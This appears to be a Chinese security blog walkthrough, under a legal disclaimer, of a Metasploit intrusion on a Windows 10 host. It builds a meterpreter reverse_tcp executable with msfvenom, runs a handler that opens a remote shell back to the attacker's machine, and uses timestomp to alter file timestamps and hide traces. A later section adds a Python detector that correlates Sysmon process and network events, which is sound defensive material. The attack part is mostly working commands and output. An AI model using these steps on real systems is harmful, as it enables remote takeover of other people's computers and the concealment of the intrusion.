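Disclaimer: The programs (methods) covered in this article may be offensive in nature and are provided for security research and teaching only. Readers who use this information for other purposes bear all legal and joint liability themselves; this site bears no legal or joint liability. If you have any questions, you can contact us by e-mail (a corporate or otherwise valid mailbox is recommended so that the message is not blocked; contact details are on the home page).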
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.117 lport=1234 --format=exe > /root/attack.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/attack.exe (the virus)
root@kali:~# service postgresql start
root@kali:~# msfconsole
msf > db_status
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.117 (the Kali Linux host)
msf exploit(handler) > set lport 1234
msf exploit(handler) > show options
msf exploit(handler) > exploit -h
msf exploit(handler) > exploit -j z
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.117:1234
msf exploit(handler) > [*] Starting the payload handler...
Listening begins.
The Windows host runs attack.exe.
msf exploit(handler) > [*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.1.94
[*] Meterpreter session 1 opened (192.168.1.117:1234 -> 192.168.1.94:58540) at 2017-03-10 00:16:54 -0500 (session 1 is created after the Windows host runs attack.exe)
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 sh-270\sewells @ SH-270 192.168.1.117:1234 -> 192.168.1.94:58540 (192.168.1.94)
msf exploit(handler) > sessions -i 1 (1 is the session Id)
meterpreter > pwd (logged in successfully)
C:\Users\sewells\Desktop
meterpreter > sysinfo
Computer : SH-270
OS : Windows 10 (Build 14393).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/win32
meterpreter > getuid
Server username: sh-270\sewells
meterpreter > timestomp -h (modify the intrusion timestamps)
meterpreter > timestomp attack.exe -v
Modified : 2017-03-10 00:01:11 -0500
Accessed : 2017-03-10 00:03:26 -0500
Created : 2017-03-10 00:18:07 -0500
Entry Modified: 2017-03-10 00:18:07 -0500
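
From the defender's side, the sequence above (a binary started from the user's Desktop that opens an outbound TCP connection seconds later) can be caught by correlating Sysmon process-creation (Event ID 1) and network-connection (Event ID 3) records on ProcessGuid. The following is an added example, not part of the original post; the event dicts are constructed and simplified (real UtcTime values carry milliseconds), and the directory list and 30-second window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Assumption: directories a standard user can write to and run binaries from.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(Desktop|Downloads|AppData\\Local\\Temp)\\", re.IGNORECASE)
WINDOW = timedelta(seconds=30)  # assumption: how soon after launch counts as "early"

def ts(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")

def find_early_callbacks(events, window=WINDOW):
    """Join Sysmon ID 1 (process create) to ID 3 (network connect) on ProcessGuid."""
    started, findings = {}, []
    for ev in sorted(events, key=lambda e: ts(e["UtcTime"])):
        guid = ev["ProcessGuid"]
        if ev["EventID"] == 1 and USER_WRITABLE.search(ev["Image"]):
            started[guid] = ev
        elif ev["EventID"] == 3 and ev["Initiated"] and guid in started:
            delay = ts(ev["UtcTime"]) - ts(started[guid]["UtcTime"])
            if delay <= window:
                findings.append({
                    "image": started[guid]["Image"],
                    "dest": f'{ev["DestinationIp"]}:{ev["DestinationPort"]}',
                    "delay_s": int(delay.total_seconds()),
                })
    return findings

# Constructed sample events (simplified Sysmon fields); addresses mirror the transcript.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2017-03-10 05:16:52", "ProcessGuid": "{A}",
     "Image": r"C:\Users\sewells\Desktop\attack.exe"},
    {"EventID": 3, "UtcTime": "2017-03-10 05:16:54", "ProcessGuid": "{A}",
     "Initiated": True, "DestinationIp": "192.168.1.117", "DestinationPort": 1234},
    # Installed browser: not in a user-writable path, so it is not tracked.
    {"EventID": 1, "UtcTime": "2017-03-10 05:10:00", "ProcessGuid": "{B}",
     "Image": r"C:\Program Files\Browser\browser.exe"},
    {"EventID": 3, "UtcTime": "2017-03-10 05:10:01", "ProcessGuid": "{B}",
     "Initiated": True, "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    # Desktop-launched tool that connects long after start: outside the window.
    {"EventID": 1, "UtcTime": "2017-03-10 05:00:00", "ProcessGuid": "{C}",
     "Image": r"C:\Users\sewells\Desktop\notes.exe"},
    {"EventID": 3, "UtcTime": "2017-03-10 05:12:00", "ProcessGuid": "{C}",
     "Initiated": True, "DestinationIp": "203.0.113.20", "DestinationPort": 443},
]

if __name__ == "__main__":
    for hit in find_early_callbacks(SAMPLE_EVENTS):
        print(hit)
```
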
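This article was first published on the WeChat official account 飓风网络安全: Reverse-connection intrusion (works on almost any Windows host) ((Do not use for illegal operations!!!))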